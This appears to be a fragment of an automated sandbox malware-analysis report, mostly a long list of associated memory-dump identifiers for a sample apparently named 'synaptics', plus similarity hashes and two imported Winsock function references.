                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6ED000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C70F000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C720000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C724000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C735000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C737000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C740000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C742000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C744000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C749000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C74B000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C760000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C762000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C764000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C766000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C768000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C770000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C772000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C780000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C791000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B0000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C801000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C812000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C820000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C822000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C824000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C826000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C828000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C830000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C832000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C834000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C836000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C838000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C841000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C843000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C854000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C856000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C858000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C85A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C865000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C867000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C869000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C86B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C874000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C876000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C878000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C880000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C882000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C884000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C886000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C893000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C898000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AC000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8ED000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2144935941.000000006C8F7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C8FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C900000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C903000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C905000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C907000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C909000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c6e0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$FileFind$ErrorFirstLastNext
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 384036507-0
                                                                                                                                                                                                                                    • Opcode ID: b9e2e3cce45397ccfac1a2f7d5485f0735ca3f54d257964faa9e10dc194368e8
                                                                                                                                                                                                                                    • Instruction ID: 8240888722d718ac883a0a02484ce933425a7da757526bf086abc2283839773c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9e2e3cce45397ccfac1a2f7d5485f0735ca3f54d257964faa9e10dc194368e8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8A10570B41207DFDB209F64CD84BADB770FF56348F10427AEA25AB651E770A680CB99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • bind.WS2_32(?,00000000), ref: 6C712226
                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32(6C86E4BC,000000A1), ref: 6C71223A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2120918855.000000006C70F000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C6E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120807504.000000006C6E0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6ED000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C720000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C724000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C735000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C737000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C740000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C742000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C744000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C749000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C74B000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C760000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C762000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C764000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C766000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C768000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C770000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C772000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C780000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C791000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B0000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C801000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C812000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C820000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C822000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C824000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C826000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C828000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C830000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C832000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C834000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C836000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C838000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83A000.00000020.00000001.01000000.0000000D.sdmpDownload File
